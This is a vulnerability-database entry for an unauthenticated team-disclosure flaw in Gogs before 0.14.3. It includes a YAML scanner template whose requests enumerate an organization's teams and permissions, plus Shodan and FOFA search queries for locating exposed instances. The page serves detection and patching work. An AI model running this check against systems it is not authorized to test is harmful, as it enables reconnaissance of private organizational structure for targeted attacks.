/Vulnerability Library

Gogs < 0.14.3 - Unauthenticated Organization Teams Disclosure

CVE-2026-52815
Early Release

Description

Gogs before version 0.14.3 contains an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint returns all teams for any organization without requiring authentication. The route group lacks the reqToken() middleware, exposing team IDs, names, descriptions, and permission levels to any unauthenticated caller.

Severity

Low

CVSS Score

4.3

Affected Product

gogs

Published Date

June 24, 2026

Template Author

0x_akoko

CVE-2026-52815.yaml
id: CVE-2026-52815

info:
  name: Gogs < 0.14.3 - Unauthenticated Organization Teams Disclosure
  author: 0x_Akoko
  severity: low
  description: |
    Gogs before version 0.14.3 contains an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint returns all teams for any organization without requiring authentication. The route group lacks the reqToken() middleware, exposing team IDs, names, descriptions, and permission levels to any unauthenticated caller.
  impact: |
    An unauthenticated attacker can enumerate all teams within any organization including private teams, discover permission levels, map organizational structure, and identify high-value admin and owner teams for targeted attacks.
  remediation: |
   Update Gogs to version 0.14.3 or later.
  reference:
    - https://github.com/gogs/gogs/security/advisories/GHSA-744x-3838-5r56
    - https://nvd.nist.gov/vuln/detail/CVE-2026-52815
  classification:
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
    cvss-score: 4.3
    cve-id: CVE-2026-52815
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 3
    vendor: gogs
    product: gogs
    shodan-query: 'http.title:"Gogs"'
    fofa-query: title="Gogs"
  tags: cve,cve2026,gogs,exposure,unauth

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/repos/search?limit=1"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: orgname
        part: body
        group: 1
        regex:
          - '"username"\s*:\s*"([^"]+)"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/orgs/{{orgname}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"username\"", "\"full_name\"")'
        internal: true
        condition: and

  - raw:
      - |
        GET /api/v1/orgs/{{orgname}}/teams HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"id\"", "\"name\"", "\"permission\"")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100a9525f9e2727d39db7843263877b35f0a0853f2c70060fa6e5f3f99913d7b81f022100d1d68293fdf7e8b3cd699ed1fbaf0d0597cbbf900cb452ba56a9af67d3ae90ad:922c64590222798bb761d5b6d8e72950
4.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-52815
CWE ID:
cwe-200

References

https://github.com/gogs/gogs/security/advisories/GHSA-744x-3838-5r56https://nvd.nist.gov/vuln/detail/CVE-2026-52815

Remediation Steps

Update Gogs to version 0.14.3 or later.